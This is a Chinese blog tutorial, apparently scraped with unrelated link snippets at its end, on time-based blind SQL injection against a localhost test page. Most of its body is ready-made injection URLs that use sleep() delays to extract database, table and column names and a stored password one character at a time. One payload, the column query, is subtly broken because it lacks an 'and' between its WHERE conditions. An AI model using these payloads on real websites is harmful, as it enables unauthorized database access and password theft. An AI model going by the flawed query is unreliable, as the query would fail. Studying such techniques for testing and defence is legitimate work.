2. 程式人生 > >SQL注入--盲注入(time型)

SQL注入--盲注入(time型)

阿新 發佈:2019-01-18

注:看這篇文章之前請先看上一篇文章<SQL注入--盲注入(bool型)>

一個帶GET引數的網站,並且不過對錯都返回相同的頁面!

http://127.0.0.1/index.php?id=1


http://127.0.0.1/index.php?id=1'


由於對錯返回的頁面一樣,無法通過頁面判斷對錯,就使用頁面重新整理時間來判斷對錯;

具體情況請了解SQL的 if(SQL語句,sleep(4),null)語法。

如:select if(user()='[email protected]',sleep(4),null)

當user()='[email protected]'為真時執行sleep(4),否則執行null。

注:

重新整理時間可以通過瀏覽器的開發者選項f12來看,或者使用Firefox的firebug外掛,或者burpsuite等工具都可以。

所以在文章<SQL注入--盲注入(bool型)>的基礎上對SQL語句進行修改:

爆庫名:

http://127.0.0.1/index.php?id=1' and if(

ascii(substr(

(select schema_name from information_schema.schemata limit 4,1),1,1

))=115

,sleep(4),null)%23

爆表名:

http://127.0.0.1/index.php?id=1' and if

(

ascii(substr(

(select table_name from information_schema.tables where table_schema=0x73716c limit 0,1),1,1

))=117

,sleep(4),null)%23

爆欄位:

http://127.0.0.1/index.php?id=1' and if(

ascii(substr(

(select column_name from information_schema.columns where table_schema=0x73716c table_name=0x75736572 limit 0,1),1,1

))=112

,sleep(4),null)%23

爆pwd

http://127.0.0.1/index.php?id=1' and if(

ascii(substr(

(select pwd from sql.user limit 0,1),1,1

))=49

,sleep(4),null)%23

SQL的詳細解釋請看文章<SQL注入--盲注入(bool型)>

相關推薦

SQL注入--注入time

注:看這篇文章之前請先看上一篇文章<SQL注入--盲注入(bool型)> 一個帶GET引數的網站,並且不過對錯都返回相同的頁面! http://127.0.0.1/index.php?i

SpringBoot專欄:配置檔案注入知識點彙總第二講

                                          &

WEB手動漏洞挖掘-SQLDVWA實戰

select * from table_name where id = ’ 1’ and 1=1– ’ 在盲注裡至少要有一個正確的結果;否則不顯示; 1'order

APC 基本概念及APC注入的實現Ring3 + Ring0----概念介紹

APC 基本概念及APC注入的實現(Ring3 + Ring0)—-概念介紹 基本術語 中斷—-一個非同步事件,可能在任何時候發生,與處理器當前正在執行的程式碼無任何關係。—-中斷的產生主要有:I/O 裝置、處理器始終,或者定時器,另外,

.NET編程01

基類 減少 inter st3 func basic line pro ping 一:Object 類型:一切類型的父類,通過繼承,子類擁有父類一切屬性和行為;任何父類出現的地方,都可以用子類來代替; 用一個方法來完成多個方法做的事 /// <summary>

sql性能分析explain關鍵字

oss sub 性能檢測 數據庫 ble group 檢查 自己 情況 explain關鍵字結果 列名所代表的的含義: Id:MySQL QueryOptimizer 選定的執行計劃中查詢的序列號。表示查詢中執行 select 子句或操作表的順序,id 值越大優先級越高,越

SQL 數據操作實驗六

com jpg 3.4 提高 數據操作 ima job dna down SQL 數據操作 emp、dept 目標表結構及數據 INSERT 命令的使用與結果驗證 2.1把一名新來雇員信息插入到EMP表中:雇員號:1011 姓名: 王曉明 入職日期:今天 insert i

Scala筆記整理:類參數與隱士轉換

大數據 Scala [TOC] 概述 類型參數是什麽?類型參數其實就是Java中的泛型。大家對Java中的泛型應該有所了解,比如我們有List list = new ArrayList(),接著list.add(1),沒問題,list.add("2"),然後我們list.get(

21. Bypass D盾_防火墻舊版 and 新版SQL註入防禦多姿勢

探索 2.0 如果 win sel cookie 系統 ID 保護 D盾舊版: 00前言 D盾_IIS防火墻,目前只支持Win2003服務器,前陣子看見官方博客說D盾新版將近期推出,相信功能會更強大,這邊分享一下之前的SQL註入防禦的測試情況。D盾_IIS防火墻註入防禦策略

23. Bypass ngx_lua_waf SQL註入防禦多姿勢

test 如何 onf nbsp 實例 TE 特殊 img 摘錄 0x00 前言 ngx_lua_waf是一款基於ngx_lua的web應用防火墻,使用簡單,高性能、輕量級。默認防禦規則在wafconf目錄中,摘錄幾條核心的SQL註入防禦規則: select.+(from

集合的嵌套和遞歸算法

入學 信息 add getc over import override 很多 tostring 1、  集合的嵌套: 集合的用法其實和數組的用法有很多共同之處,在使用數組的時候,二維數組就是數組的嵌套; 那麽在集合之中是否也可以這樣呢? 當然也是可以的,例如對於最復雜的的m

SQL語句小tips持續更新

區分大小寫 day col lec pre block mys strong code 統計非法數據 判斷people_id是否是32為字母組成的,統計不滿足要求的數據 SELECT COUNT(IF(BINARY people_id NOT REGEXP ‘^[0

設計模式十一代理模式Proxy結構

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

設計模式介面卡模式Adapter結構

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

轉發一道java基礎題

這是在網上只看到的一道java關於多型繼承的問題,看著很簡單,結構出乎意料,也是研究了一天終於搞明白了一點 問題來自:http://blog.itpub.net/28562677/viewspace-1200194/ [java]  view

設計模式裝飾器模式Decorator結構

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

設計模式橋連模式Bridge結構

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

設計模式建造者模式Builder建立

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

sql拆分日期字串20181111-20181112

sql拆分日期字串data_prid_desc(20181111-20181112) 如:拆分成開始時間exe_bgn_time120181111,結束時間exe_end_time120181112 substring_index(s.data_prid_desc, '-', 1) AS

2018年11月16日SQL Server實驗內容觸發器實驗

--注意:先把studentmanager資料庫中的所有表用select into命令複製一份, --然後用複製後新表完成下面的實驗,同時,對每個觸發器都要進行驗證。 select *into department2 from department select *into course2 fro